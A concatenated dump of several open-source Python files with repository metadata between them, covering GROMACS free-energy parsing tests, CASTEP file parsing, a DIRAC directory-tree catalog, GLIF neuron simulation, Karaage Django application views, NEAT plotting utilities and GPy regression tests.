dataset = load_expanded_ensemble_case_3()
for leg in dataset['data']:
for filename in dataset['data'][leg]:
dHdl = extract_dHdl(filename, T=300)
assert dHdl.index.names == ['time', 'fep-lambda', 'coul-lambda', 'vdw-lambda', 'restraint-lambda']
assert dHdl.shape == (2500, 4)
def test_u_nk_with_total_energy():
"""Test that the reduced potential is calculated correctly when the total energy is given.
"""
# Load dataset
dataset = load_water_particle_with_total_energy()
# Check if the sum of values on the diagonal has the correct value
assert_almost_equal(_diag_sum(dataset), 47611374980.34574, decimal=4)
# Check one specific value in the dataframe
assert_almost_equal(
extract_u_nk(dataset['data']['AllStates'][0], T=300).iloc[0][0],
-11211.577658852531,
decimal=6
)
def test_u_nk_with_potential_energy():
"""Test that the reduced potential is calculated correctly when the potential energy is given.
"""
# Load dataset
dataset = load_water_particle_with_potential_energy()
# Check if the sum of values on the diagonal has the correct value
assert_almost_equal(_diag_sum(dataset), 16674040406778.867, decimal=2)
# Check one specific value in the dataframe
assert_almost_equal(
extract_u_nk(dataset['data']['AllStates'][0], T=300).iloc[0][0],
-15656.557252200757,
decimal=6
)
def test_u_nk_without_energy():
"""Test that the reduced potential is calculated correctly when no energy is given.
"""
# Load dataset
dataset = load_water_particle_without_energy()
# Check if the sum of values on the diagonal has the correct value
assert_almost_equal(_diag_sum(dataset), 20572986867158.184, decimal=2)
# Check one specific value in the dataframe
assert_almost_equal(
extract_u_nk(dataset['data']['AllStates'][0], T=300).iloc[0][0],
0.0,
decimal=6
)
def _diag_sum(dataset):
"""Calculate the sum of diagonal elements (i, i)
"""
# Initialize the sum variable
ds = 0.0
for leg in dataset['data']:
for filename in dataset['data'][leg]:
u_nk = extract_u_nk(filename, T=300)
# Calculate the sum of diagonal elements:
for i in range(len(dataset['data'][leg])):
ds += u_nk.iloc[i][i]
return ds
def test_extract_u_nk_unit():
'''Test if extract_u_nk assign the attr correctly'''
dataset = load_benzene()
u_nk = extract_u_nk(dataset['data']['Coulomb'][0], 310)
assert u_nk.attrs['temperature'] == 310
assert u_nk.attrs['energy_unit'] == 'kT'
def test_extract_dHdl_unit():
'''Test if extract_u_nk assign the attr correctly'''
dataset = load_benzene()
dhdl = extract_dHdl(dataset['data']['Coulomb'][0], 310)
assert dhdl.attrs['temperature'] == 310
assert dhdl.attrs['energy_unit'] == 'kT'
|
alchemistry/alchemlyb
|
src/alchemlyb/tests/parsing/test_gmx.py
|
Python
|
bsd-3-clause
| 6,231
|
[
"Gromacs"
] |
fd6eb5a77ead720ee0d6a75770de2d1eba2eb4b7db236f7a5a47c266fb83feac
|
#!/usr/bin/env python
"""
castep.py
Various bits of python to read/write castep files
Copyright (c) 2010 Andrew Walker (a.walker@ucl.ac.uk)
All rights reserved.
"""
import re
import scipy as S
version = 0.1
# regular expression to match the whole of the final cell from a .castep file
dotcastep_latt_RE = re.compile(r"""\sL?BFGS\s*:\sFinal\sConfiguration:\s*\n
=+\s*\n\s*\n\s+\-+\s*\n\s+Unit\sCell\s*\n\s+\-+\s*\n
\s+Real\sLattice\(A\)\s+Reciprocal\sLattice\(1/A\)\s*\n
\s+([\+\-]?\d+.\d+)\s+([\+\-]?\d+.\d+)\s+([\+\-]?\d+.\d+)\s+([\+\-]?\d+.\d+)\s+([\+\-]?\d+.\d+)\s+([\+\-]?\d+.\d+)\s*\n
\s+([\+\-]?\d+.\d+)\s+([\+\-]?\d+.\d+)\s+([\+\-]?\d+.\d+)\s+([\+\-]?\d+.\d+)\s+([\+\-]?\d+.\d+)\s+([\+\-]?\d+.\d+)\s*\n
\s+([\+\-]?\d+.\d+)\s+([\+\-]?\d+.\d+)\s+([\+\-]?\d+.\d+)\s+([\+\-]?\d+.\d+)\s+([\+\-]?\d+.\d+)\s+([\+\-]?\d+.\d+)\s*\n""",
re.VERBOSE)
# Start of the 'final configuration'
dotcastep_infinal_RE = re.compile(r"BFGS\s*: Final Configuration:")
# Once inside final configuation, this should only match a line with atoms
dotcastep_atomline_RE = re.compile(r"x\s+(\w+)\s+\d+\s+([\+\-]?\d+.\d+)\s+([\+\-]?\d+.\d+)\s+([\+\-]?\d+.\d+)\s+x")
# Get the point group number
dotcastep_poinggroup_RE = re.compile(r"^\s+Point group of crystal =\s+([\+\-]?\d+):")
def parse_dotcastep(seedname):
"""
Extract lattice and atom positions from a .castep
file. List of atoms may be empty (e.g. MgO)
"""
dotCastep = open(seedname+".castep","r")
# Find the lattice
latticeblock = dotcastep_latt_RE.findall(dotCastep.read())[-1] # Get the last block - handle concat restarts
lattice = []
lattice.append([float(latticeblock[0]), float(latticeblock[1]), float(latticeblock[2])])
lattice.append([float(latticeblock[6]), float(latticeblock[7]), float(latticeblock[8])])
lattice.append([float(latticeblock[12]), float(latticeblock[13]), float(latticeblock[14])])
# rewind and search for and final atomic positions (these will be absent if e.g. they are all on symmetry positions)
dotCastep.seek(0)
in_atoms = False
pointgroup = None
atoms = []
for line in dotCastep:
sym_line = dotcastep_poinggroup_RE.search(line)
atom_line = dotcastep_atomline_RE.search(line)
if (in_atoms and atom_line):
atoms.append([atom_line.group(1), float(atom_line.group(2)), \
float(atom_line.group(3)), float(atom_line.group(4))])
elif ((not in_atoms) and (dotcastep_infinal_RE.search(line))):
in_atoms = True
elif (sym_line):
pointgroup = int(sym_line.group(1))
dotCastep.close()
return (lattice, pointgroup, atoms)
# Regular expressions to match a lattice block in a castep .cell file. Note that these
# can be of the form %block lattice_abc or %block lattice_cart and are case insensitive
dotcell_lattice_start_RE = re.compile(r"^\s*%BLOCK\s+LATTICE_(?:CART|ABC)",re.IGNORECASE)
dotcell_lattice_end_RE = re.compile(r"^\s*%ENDBLOCK\s+LATTICE_(?:CART|ABC)",re.IGNORECASE)
dotcell_atoms_start_RE = re.compile(r"^\s*%BLOCK\s+POSITIONS_(?:FRAC|ABS)", re.IGNORECASE)
dotcell_atoms_end_RE = re.compile(r"^\s*%ENDBLOCK\s+POSITIONS_(?:FRAC|ABS)", re.IGNORECASE)
def produce_dotcell(seedname, filename, defcell, atoms):
"""
produce_dotcell: reads <seedname>.cell (CASTEP cell file
and writes a new .cell file to <filename> replacing the
lattice block with a new crystalographic lattice <defcell>
(which should be supplied as a list of three lists, each with
three elements). Also adds command to fix cell during optimization.
"""
in_lattice = False
in_atoms = False
have_atoms = (atoms != []) # If we have an empty list, no atoms were optimized so just leave them in the .cell file.
inputfile = open(seedname+".cell", "r")
outputfile = open(filename, "w")
for line in inputfile:
if (dotcell_lattice_end_RE.search(line) and in_lattice):
in_lattice = False
elif (dotcell_lattice_start_RE.search(line) and not in_lattice):
outputfile.write("%block LATTICE_CART\n")
outputfile.write(str(defcell[0][0]) + " " + str(defcell[0][1]) + " " + str(defcell[0][2]) + "\n")
outputfile.write(str(defcell[1][0]) + " " + str(defcell[1][1]) + " " + str(defcell[1][2]) + "\n")
outputfile.write(str(defcell[2][0]) + " " + str(defcell[2][1]) + " " + str(defcell[2][2]) + "\n")
outputfile.write("%endblock LATTICE_CART\n")
outputfile.write("FIX_ALL_CELL true\n")
in_lattice = True
elif (dotcell_atoms_end_RE.search(line) and in_atoms and have_atoms):
in_atoms = False
elif ((dotcell_atoms_start_RE.search(line)) and (not in_atoms) and have_atoms):
outputfile.write("%block POSITIONS_FRAC\n")
for atom in atoms:
outputfile.write(" " + atom[0] + " " + str(atom[1]) + " " + str(atom[2]) + " " + str(atom[3]) + "\n")
outputfile.write("%endblock POSITIONS_FRAC\n")
in_atoms = True
elif(not (in_lattice or in_atoms)):
outputfile.write(line)
inputfile.close
outputfile.close
return()
# regular expression which matches the whole stress tensor block from a .castep file
stressRE = re.compile(r"\s\*+\s(?:Symmetrised\s)?Stress\sTensor\s\*+\n.+\n.+?\((\w+)\).+\n.+\n.+\n.+\n\s\*\s+x\s+([\+\-]?\d+.\d+)\s+([\+\-]?\d+.\d+)\s+([\+\-]?\d+.\d+)\s+\*\n\s\*\s+y\s+[\+\-]?\d+.\d+\s+([\+\-]?\d+.\d+)\s+([\+\-]?\d+.\d+)\s+\*\n\s\*\s+z\s+[\+\-]?\d+.\d+\s+[\+\-]?\d+.\d+\s+([\+\-]?\d+.\d+)\s+\*\n")
def get_stress_dotcastep(filename):
"""Extract the stress tensor from a .castep file
Returns a tuple of (<units>, <stress>) where <units>
is a string representing the stress units and
<stress> is a numpy vector of the elements of the
stress tensor in the order s(1,1), s(2,2), s(3,3)
s(3,2), s(3,1), s(2,1).
"""
dotCastep = open(filename,"r")
stressData = stressRE.findall(dotCastep.read())[0]
dotCastep.close()
units = stressData[0]
stress = S.array([float(stressData[1]),float(stressData[4]),
float(stressData[6]),float(stressData[5]),
float(stressData[3]),float(stressData[2])])
return(units, stress)
|
andreww/elastic-constants
|
castep.py
|
Python
|
bsd-3-clause
| 6,008
|
[
"CASTEP",
"CRYSTAL"
] |
4df9193002ee33afcba6820c82a42a330afce06ea45f4e9df72932c059d2b9fb
|
""" DIRAC FileCatalog component representing a directory tree with simple nodes
"""
import os
from DIRAC import S_OK, S_ERROR
from DIRAC.DataManagementSystem.DB.FileCatalogComponents.DirectoryManager.DirectoryTreeBase import DirectoryTreeBase
class DirectoryNodeTree(DirectoryTreeBase):
"""Class managing Directory Tree as a self-linked structure with directory
names stored in each node
"""
def __init__(self, database=None):
DirectoryTreeBase.__init__(self, database)
self.treeTable = "FC_DirectoryTreeM"
def findDir(self, path):
"""Find the identifier of a directory specified by its path"""
dpath = path
if path[0] == "/":
dpath = path[1:]
elements = dpath.split("/")
req = " "
for level in range(len(elements), 0, -1):
if level > 1:
req += "SELECT DirID from FC_DirectoryTreeM WHERE Level=%d AND DirName='%s' AND Parent=(" % (
level,
elements[level - 1],
)
else:
req += "SELECT DirID from FC_DirectoryTreeM WHERE Level=%d AND DirName='%s'" % (
level,
elements[level - 1],
)
req += ")" * (len(elements) - 1)
# print req
result = self.db._query(req)
# print "in findDir",result
if not result["OK"]:
return result
if not result["Value"]:
return S_OK(0)
return S_OK(result["Value"][0][0])
def makeDir(self, path):
"""Create a single directory"""
result = self.findDir(path)
if not result["OK"]:
return result
dirID = result["Value"]
if dirID:
return S_OK(dirID)
dpath = path
if path[0] == "/":
dpath = path[1:]
elements = dpath.split("/")
level = len(elements)
dirName = elements[-1]
result = self.getParent(path)
if not result["OK"]:
return result
parentDirID = result["Value"]
names = ["DirName", "Level", "Parent"]
values = [dirName, level, parentDirID]
result = self.db.insertFields("FC_DirectoryTreeM", names, values)
if not result["OK"]:
return result
return S_OK(result["lastRowId"])
def existsDir(self, path):
"""Check the existence of a directory at the specified path"""
result = self.findDir(path)
if not result["OK"]:
return result
if not result["Value"]:
return S_OK({"Exists": False})
else:
return S_OK({"Exists": True, "DirID": result["Value"]})
def getParent(self, path):
"""Get the parent ID of the given directory"""
dpath = path
if path[0] == "/":
dpath = path[1:]
elements = dpath.split("/")
if len(elements) > 1:
parentDir = os.path.dirname(path)
result = self.findDir(parentDir)
if not result["OK"]:
return result
parentDirID = result["Value"]
if not parentDirID:
return S_ERROR("No parent directory")
return S_OK(parentDirID)
else:
return S_OK(0)
def getParentID(self, dirID):
""" """
if dirID == 0:
return S_ERROR("Root directory ID given")
req = "SELECT Parent FROM FC_DirectoryTreeM WHERE DirID=%d" % dirID
result = self.db._query(req)
if not result["OK"]:
return result
if not result["Value"]:
return S_ERROR("No parent found")
return S_OK(result["Value"][0][0])
def getDirectoryName(self, dirID):
"""Get directory name by directory ID"""
req = "SELECT DirName FROM FC_DirectoryTreeM WHERE DirID=%d" % int(dirID)
result = self.db._query(req)
if not result["OK"]:
return result
if not result["Value"]:
return S_ERROR("Directory with id %d not found" % int(dirID))
return S_OK(result["Value"][0][0])
def getDirectoryPath(self, dirID):
"""Get directory path by directory ID"""
dirPath = ""
dID = dirID
while True:
result = self.getDirectoryName(dID)
if not result["OK"]:
return result
dirPath = "/" + result["Value"] + dirPath
result = self.getParentID(dID)
if not result["OK"]:
return result
if result["Value"] == 0:
break
else:
dID = result["Value"]
return S_OK("/" + dirPath)
def getPathIDs(self, path):
"""Get IDs of all the directories in the parent hierarchy"""
result = self.findDir(path)
if not result["OK"]:
return result
dID = result["Value"]
parentIDs = []
while True:
result = self.getParent(dID)
if not result["OK"]:
return result
dID = result["Value"]
parentIDs.append(dID)
if dID == 0:
break
parentIDs.append(0)
parentIDs.reverse()
return S_OK(parentIDs)
def getChildren(self, path):
"""Get child directory IDs for the given directory"""
if isinstance(path, str):
result = self.findDir(path)
if not result["OK"]:
return result
dirID = result["Value"]
else:
dirID = path
req = "SELECT DirID FROM FC_DirectoryTreeM WHERE Parent=%d" % dirID
result = self.db._query(req)
if not result["OK"]:
return result
if not result["Value"]:
return S_OK([])
return S_OK([x[0] for x in result["Value"]])
|
DIRACGrid/DIRAC
|
src/DIRAC/DataManagementSystem/DB/FileCatalogComponents/DirectoryManager/DirectoryNodeTree.py
|
Python
|
gpl-3.0
| 5,866
|
[
"DIRAC"
] |
17ccab40d3db527df4871e83b6454394ed5950d6ccd5a93e7341f6ee91dbba6f
|
# Copyright 2015 Allen Institute for Brain Science
# This file is part of Allen SDK.
#
# Allen SDK is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, version 3 of the License.
#
# Allen SDK is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Allen SDK. If not, see <http://www.gnu.org/licenses/>.
import logging, time
import argparse, os
import numpy as np
import allensdk.core.json_utilities as json_utilities
from allensdk.core.nwb_data_set import NwbDataSet
from allensdk.api.queries.glif_api import GlifApi
from allensdk.model.glif.glif_neuron import GlifNeuron
DEFAULT_SPIKE_CUT_VALUE = 0.05 # 50mV
def parse_arguments():
''' Use argparse to get required arguments from the command line '''
parser = argparse.ArgumentParser(description='fit a neuron')
parser.add_argument('--ephys_file', help='ephys file name')
parser.add_argument('--sweeps_file', help='JSON file listing sweep properties')
parser.add_argument('--neuron_config_file', help='neuron configuration JSON file ')
parser.add_argument('--neuronal_model_id', help='id of the neuronal model. Used when downloading sweep properties.', type=int)
parser.add_argument('--output_ephys_file', help='output file name')
parser.add_argument('--log_level', help='log level', default=logging.INFO)
parser.add_argument('--spike_cut_value', help='value to fill in for spike duration', default=DEFAULT_SPIKE_CUT_VALUE, type=float)
return parser.parse_args()
def simulate_sweep(neuron, stimulus, spike_cut_value):
''' Simulate a neuron given a stimulus and initial conditions. '''
start_time = time.time()
logging.debug("simulating")
data = neuron.run(stimulus)
voltage = data['voltage']
voltage[np.isnan(voltage)] = spike_cut_value
logging.debug("simulation time %f" % (time.time() - start_time))
return data
def load_sweep(file_name, sweep_number):
''' Load the stimulus for a sweep from file. '''
logging.debug("loading sweep %d" % sweep_number)
load_start_time = time.time()
data = NwbDataSet(file_name).get_sweep(sweep_number)
logging.debug("load time %f" % (time.time() - load_start_time))
return data
def write_sweep_response(file_name, sweep_number, response, spike_times):
''' Overwrite the response in a file. '''
logging.debug("writing sweep")
write_start_time = time.time()
ephds = NwbDataSet(file_name)
ephds.set_sweep(sweep_number, stimulus=None, response=response)
ephds.set_spike_times(sweep_number, spike_times)
logging.debug("write time %f" % (time.time() - write_start_time))
def simulate_sweep_from_file(neuron, sweep_number, input_file_name, output_file_name, spike_cut_value):
''' Load a sweep stimulus, simulate the response, and write it out. '''
sweep_start_time = time.time()
try:
data = load_sweep(input_file_name, sweep_number)
except Exception,e:
logging.warning("Failed to load sweep, skipping. (%s)" % str(e))
raise
# tell the neuron what dt should be for this sweep
neuron.dt = 1.0 / data['sampling_rate']
sim_data = simulate_sweep(neuron, data['stimulus'], spike_cut_value)
write_sweep_response(output_file_name, sweep_number, sim_data['voltage'], sim_data['interpolated_spike_times'])
logging.debug("total sweep time %f" % ( time.time() - sweep_start_time ))
def simulate_neuron(neuron, sweep_numbers, input_file_name, output_file_name, spike_cut_value):
start_time = time.time()
for sweep_number in sweep_numbers:
simulate_sweep_from_file(neuron, sweep_number, input_file_name, output_file_name, spike_cut_value)
logging.debug("total elapsed time %f" % (time.time() - start_time))
def main():
args = parse_arguments()
logging.getLogger().setLevel(args.log_level)
glif_api = None
if (args.neuron_config_file is None or
args.sweeps_file is None or
args.ephys_file is None):
assert args.neuronal_model_id is not None, Exception("A neuronal model id is required if no neuron config file, sweeps file, or ephys data file is provided.")
glif_api = GlifApi()
glif_api.get_neuronal_model(args.neuronal_model_id)
if args.neuron_config_file:
neuron_config = json_utilities.read(args.neuron_config_file)
else:
neuron_config = glif_api.get_neuron_config()
if args.sweeps_file:
sweeps = json_utilities.read(args.sweeps_file)
else:
sweeps = glif_api.get_ephys_sweeps()
if args.ephys_file:
ephys_file = args.ephys_file
else:
ephys_file = 'stimulus_%d.nwb' % args.neuronal_model_id
if not os.path.exists(ephys_file):
logging.info("Downloading stimulus to %s." % ephys_file)
glif_api.cache_stimulus_file(ephys_file)
else:
logging.warning("Reusing %s because it already exists." % ephys_file)
if args.output_ephys_file:
output_ephys_file = args.output_ephys_file
else:
logging.warning("Overwriting input file data with simulated data in place.")
output_ephys_file = ephys_file
neuron = GlifNeuron.from_dict(neuron_config)
# filter out test sweeps
sweep_numbers = [ s['sweep_number'] for s in sweeps if s['stimulus_name'] != 'Test' ]
simulate_neuron(neuron, sweep_numbers, ephys_file, output_ephys_file, args.spike_cut_value)
if __name__ == "__main__": main()
|
wvangeit/AllenSDK
|
allensdk/model/glif/simulate_neuron.py
|
Python
|
gpl-3.0
| 5,862
|
[
"NEURON"
] |
bef7522357adf09f9880d910dccbc1dd1cf2b8f0c15efd4a17cebe0c237be788
|
# Copyright 2010-2017, The University of Melbourne
# Copyright 2010-2017, Brian May
#
# This file is part of Karaage.
#
# Karaage is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Karaage is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Karaage If not, see <http://www.gnu.org/licenses/>.
""" This file shows the project application views using a state machine. """
from django.conf import settings
from django.http import HttpResponseForbidden, HttpResponseRedirect
from django.shortcuts import get_object_or_404, render
from django.urls import reverse
from karaage.common import is_admin
from karaage.common.decorators import login_required
from karaage.people.models import Person
from karaage.projects.models import Project
from .. import forms
from ..models import Applicant, ProjectApplication
from . import base
def get_application_state_machine():
""" Get the default state machine for applications. """
config = settings.APPLICATION_PROJECT
state_machine = base.StateMachine(config)
return state_machine
def register():
base.setup_application_type(
ProjectApplication, get_application_state_machine())
def get_applicant_from_email(email):
"""
Get applicant from email address.
If the person exists, return (None, person)
If multiple matches, return (None, None)
Otherwise create applicant and return (applicant, None)
"""
try:
applicant = None
existing_person = Person.active.get(email=email)
except Person.DoesNotExist:
applicant = Applicant.objects.create(email=email)
existing_person = None
except Person.MultipleObjectsReturned:
applicant = None
existing_person = False
return applicant, existing_person
def _send_invitation(request, project):
""" The logged in project leader OR administrator wants to invite somebody.
"""
form = forms.InviteUserApplicationForm(request.POST or None)
if request.method == 'POST':
if form.is_valid():
email = form.cleaned_data['email']
applicant, existing_person = get_applicant_from_email(email)
# If applicant is None then there were multiple persons found.
if applicant is None and existing_person is None:
return render(
template_name='kgapplications/'
'project_common_invite_multiple.html',
context={'form': form, 'email': email},
request=request)
if existing_person is not None and 'existing' not in request.POST:
return render(
template_name='kgapplications/'
'project_common_invite_existing.html',
context={'form': form, 'person': applicant},
request=request)
application = form.save(commit=False)
application.new_applicant = applicant
application.existing_person = existing_person
application.project = project
application.save()
state_machine = get_application_state_machine()
response = state_machine.start(request, application)
return response
return render(
template_name='kgapplications/project_common_invite_other.html',
context={'form': form, 'project': project, },
request=request)
@login_required
def send_invitation(request, project_id=None):
""" The logged in project leader wants to invite somebody to their project.
"""
project = None
if project_id is not None:
project = get_object_or_404(Project, id=project_id)
if project is None:
if not is_admin(request):
return HttpResponseForbidden('<h1>Access Denied</h1>')
else:
if not project.can_edit(request):
return HttpResponseForbidden('<h1>Access Denied</h1>')
return _send_invitation(request, project)
def new_application(request):
""" A new application by a user to start a new project. """
# Note default kgapplications/index.html will display error if user logged
# in.
if not settings.ALLOW_REGISTRATIONS:
return render(
template_name='kgapplications/project_common_disabled.html',
context={},
request=request)
roles = {'is_applicant', 'is_authorised'}
if not request.user.is_authenticated:
defaults = {}
form = forms.UnauthenticatedInviteUserApplicationForm(
request.POST or None, initial=defaults)
if request.method == 'POST':
if form.is_valid():
email = form.cleaned_data['email']
applicant, existing_person = get_applicant_from_email(email)
# If applicant is None then there were multiple persons found.
# This should never happen as the
# UnauthenticatedInviteUserApplicationForm form disallows
# existing users applying unauthenticated.
assert applicant is not None
# Similarly existing_person should always be None here.
assert existing_person is None
application = ProjectApplication()
application.new_applicant = applicant
application.save()
state_machine = get_application_state_machine()
state_machine.start(request, application, roles)
# we do not show unauthenticated users the application at this
# stage.
url = reverse('index')
return HttpResponseRedirect(url)
return render(
template_name='kgapplications/'
'project_common_invite_unauthenticated.html',
context={'form': form, },
request=request)
else:
if request.method == 'POST':
person = request.user
application = ProjectApplication()
application.existing_person = person
application.save()
state_machine = get_application_state_machine()
response = state_machine.start(request, application, roles)
return response
return render(
template_name='kgapplications/'
'project_common_invite_authenticated.html',
context={},
request=request)
|
brianmay/karaage
|
karaage/plugins/kgapplications/views/project.py
|
Python
|
gpl-3.0
| 6,844
|
[
"Brian"
] |
8389a715c36d98ef34d6515aa66699400e3b2db62aace2a4936b6068f19e3fb5
|
# -*- coding: utf-8 -*-
__all__ = [
"StretchMove",
"WalkMove",
"DEMove",
"KDEMove",
"MHMove",
"GaussianMove",
"HamiltonianMove",
"NoUTurnsMove",
]
from .walk import WalkMove
from .stretch import StretchMove
from .de import DEMove
from .kde import KDEMove
from .mh import MHMove
from .gaussian import GaussianMove
from .hmc import HamiltonianMove
from .nuts import NoUTurnsMove
|
jellis18/emcee3
|
emcee3/moves/__init__.py
|
Python
|
mit
| 413
|
[
"Gaussian"
] |
c85ac07d2405f91abc817545975647d2dae82126dcaaadee689e0b4a9d755e5d
|
from __future__ import print_function
import copy
import warnings
import graphviz
import matplotlib.pyplot as plt
import numpy as np
def plot_stats(statistics, ylog=False, view=False, filename='avg_fitness.svg'):
""" Plots the population's average and best fitness. """
if plt is None:
warnings.warn("This display is not available due to a missing optional dependency (matplotlib)")
return
generation = range(len(statistics.most_fit_genomes))
best_fitness = [c.fitness for c in statistics.most_fit_genomes]
avg_fitness = np.array(statistics.get_fitness_mean())
stdev_fitness = np.array(statistics.get_fitness_stdev())
plt.plot(generation, avg_fitness, 'b-', label="average")
plt.plot(generation, avg_fitness - stdev_fitness, 'g-.', label="-1 sd")
plt.plot(generation, avg_fitness + stdev_fitness, 'g-.', label="+1 sd")
plt.plot(generation, best_fitness, 'r-', label="best")
plt.title("Population's average and best fitness")
plt.xlabel("Generations")
plt.ylabel("Fitness")
plt.grid()
plt.legend(loc="best")
if ylog:
plt.gca().set_yscale('symlog')
plt.savefig(filename)
if view:
plt.show()
plt.close()
def plot_spikes(spikes, view=False, filename=None, title=None):
""" Plots the trains for a single spiking neuron. """
if plt is None:
warnings.warn("This display is not available due to a missing optional dependency (matplotlib)")
return
t_values = [t for t, I, v, u in spikes]
v_values = [v for t, I, v, u in spikes]
u_values = [u for t, I, v, u in spikes]
I_values = [I for t, I, v, u in spikes]
fig = plt.figure()
plt.subplot(3, 1, 1)
plt.ylabel("Potential (mv)")
plt.xlabel("Time (in ms)")
plt.grid()
plt.plot(t_values, v_values, "g-")
if title is None:
plt.title("Izhikevich's spiking neuron model")
else:
plt.title("Izhikevich's spiking neuron model ({0!s})".format(title))
plt.subplot(3, 1, 2)
plt.ylabel("Recovery (u)")
plt.xlabel("Time (in ms)")
plt.grid()
plt.plot(t_values, u_values, "r-")
plt.subplot(3, 1, 3)
plt.ylabel("Current (I)")
plt.xlabel("Time (in ms)")
plt.grid()
plt.plot(t_values, I_values, "r-o")
if filename is not None:
plt.savefig(filename)
if view:
plt.show()
plt.close()
fig = None
return fig
def plot_species(statistics, view=False, filename='speciation.svg'):
""" Visualizes speciation throughout evolution. """
if plt is None:
warnings.warn("This display is not available due to a missing optional dependency (matplotlib)")
return
species_sizes = statistics.get_species_sizes()
num_generations = len(species_sizes)
curves = np.array(species_sizes).T
fig, ax = plt.subplots()
ax.stackplot(range(num_generations), *curves)
plt.title("Speciation")
plt.ylabel("Size per Species")
plt.xlabel("Generations")
plt.savefig(filename)
if view:
plt.show()
plt.close()
def draw_net(config, genome, view=False, filename=None, node_names=None, show_disabled=True, prune_unused=False,
node_colors=None, fmt='svg'):
""" Receives a genome and draws a neural network with arbitrary topology. """
# Attributes for network nodes.
if graphviz is None:
warnings.warn("This display is not available due to a missing optional dependency (graphviz)")
return
if node_names is None:
node_names = {}
assert type(node_names) is dict
if node_colors is None:
node_colors = {}
assert type(node_colors) is dict
node_attrs = {
'shape': 'circle',
'fontsize': '9',
'height': '0.2',
'width': '0.2'}
dot = graphviz.Digraph(format=fmt, node_attr=node_attrs)
inputs = set()
for k in config.genome_config.input_keys:
inputs.add(k)
name = node_names.get(k, str(k))
input_attrs = {'style': 'filled',
'shape': 'box'}
input_attrs['fillcolor'] = node_colors.get(k, 'lightgray')
dot.node(name, _attributes=input_attrs)
outputs = set()
for k in config.genome_config.output_keys:
outputs.add(k)
name = node_names.get(k, str(k))
node_attrs = {'style': 'filled'}
node_attrs['fillcolor'] = node_colors.get(k, 'lightblue')
dot.node(name, _attributes=node_attrs)
if prune_unused:
connections = set()
for cg in genome.connections.values():
if cg.enabled or show_disabled:
connections.add((cg.in_node_id, cg.out_node_id))
used_nodes = copy.copy(outputs)
pending = copy.copy(outputs)
while pending:
#print(pending, used_nodes)
new_pending = set()
for a, b in connections:
if b in pending and a not in used_nodes:
new_pending.add(a)
used_nodes.add(a)
pending = new_pending
else:
used_nodes = set(genome.nodes.keys())
for n in used_nodes:
if n in inputs or n in outputs:
continue
attrs = {'style': 'filled'}
attrs['fillcolor'] = node_colors.get(n, 'white')
dot.node(str(n), _attributes=attrs)
for cg in genome.connections.values():
if cg.enabled or show_disabled:
#if cg.input not in used_nodes or cg.output not in used_nodes:
# continue
input, output = cg.key
a = node_names.get(input, str(input))
b = node_names.get(output, str(output))
style = 'solid' if cg.enabled else 'dotted'
color = 'green' if cg.weight > 0 else 'red'
width = str(0.1 + abs(cg.weight / 5.0))
dot.edge(a, b, _attributes={'style': style, 'color': color, 'penwidth': width})
dot.render(filename, view=view)
return dot
|
drallensmith/neat-python
|
examples/memory-variable/visualize.py
|
Python
|
bsd-3-clause
| 5,965
|
[
"NEURON"
] |
fa317a34b9d4f844cadfd280f8d2ef31cd706a7518a6ce37067827ac8774da1a
|
# Copyright (c) 2012, GPy authors (see AUTHORS.txt).
# Licensed under the BSD 3-clause license (see LICENSE.txt)
import unittest
import numpy as np
import GPy
class MiscTests(unittest.TestCase):
def setUp(self):
self.N = 20
self.N_new = 50
self.D = 1
self.X = np.random.uniform(-3., 3., (self.N, 1))
self.Y = np.sin(self.X) + np.random.randn(self.N, self.D) * 0.05
self.X_new = np.random.uniform(-3., 3., (self.N_new, 1))
def test_setXY(self):
m = GPy.models.GPRegression(self.X, self.Y)
m.set_XY(np.vstack([self.X, np.random.rand(1,self.X.shape[1])]), np.vstack([self.Y, np.random.rand(1,self.Y.shape[1])]))
m._trigger_params_changed()
self.assertTrue(m.checkgrad())
m.predict(m.X)
def test_raw_predict_numerical_stability(self):
"""
Test whether the predicted variance of normal GP goes negative under numerical unstable situation.
Thanks simbartonels@github for reporting the bug and providing the following example.
"""
# set seed for reproducability
np.random.seed(3)
# Definition of the Branin test function
def branin(X):
y = (X[:,1]-5.1/(4*np.pi**2)*X[:,0]**2+5*X[:,0]/np.pi-6)**2
y += 10*(1-1/(8*np.pi))*np.cos(X[:,0])+10
return(y)
# Training set defined as a 5*5 grid:
xg1 = np.linspace(-5,10,5)
xg2 = np.linspace(0,15,5)
X = np.zeros((xg1.size * xg2.size,2))
for i,x1 in enumerate(xg1):
for j,x2 in enumerate(xg2):
X[i+xg1.size*j,:] = [x1,x2]
Y = branin(X)[:,None]
# Fit a GP
# Create an exponentiated quadratic plus bias covariance function
k = GPy.kern.RBF(input_dim=2, ARD = True)
# Build a GP model
m = GPy.models.GPRegression(X,Y,k)
# fix the noise variance
m.likelihood.variance.fix(1e-5)
# Randomize the model and optimize
m.randomize()
m.optimize()
# Compute the mean of model prediction on 1e5 Monte Carlo samples
Xp = np.random.uniform(size=(1e5,2))
Xp[:,0] = Xp[:,0]*15-5
Xp[:,1] = Xp[:,1]*15
_, var = m.predict(Xp)
self.assertTrue(np.all(var>=0.))
def test_raw_predict(self):
k = GPy.kern.RBF(1)
m = GPy.models.GPRegression(self.X, self.Y, kernel=k)
m.randomize()
m.likelihood.variance = .5
Kinv = np.linalg.pinv(k.K(self.X) + np.eye(self.N) * m.likelihood.variance)
K_hat = k.K(self.X_new) - k.K(self.X_new, self.X).dot(Kinv).dot(k.K(self.X, self.X_new))
mu_hat = k.K(self.X_new, self.X).dot(Kinv).dot(m.Y_normalized)
mu, covar = m.predict_noiseless(self.X_new, full_cov=True)
self.assertEquals(mu.shape, (self.N_new, self.D))
self.assertEquals(covar.shape, (self.N_new, self.N_new))
np.testing.assert_almost_equal(K_hat, covar)
np.testing.assert_almost_equal(mu_hat, mu)
mu, var = m.predict_noiseless(self.X_new)
self.assertEquals(mu.shape, (self.N_new, self.D))
self.assertEquals(var.shape, (self.N_new, 1))
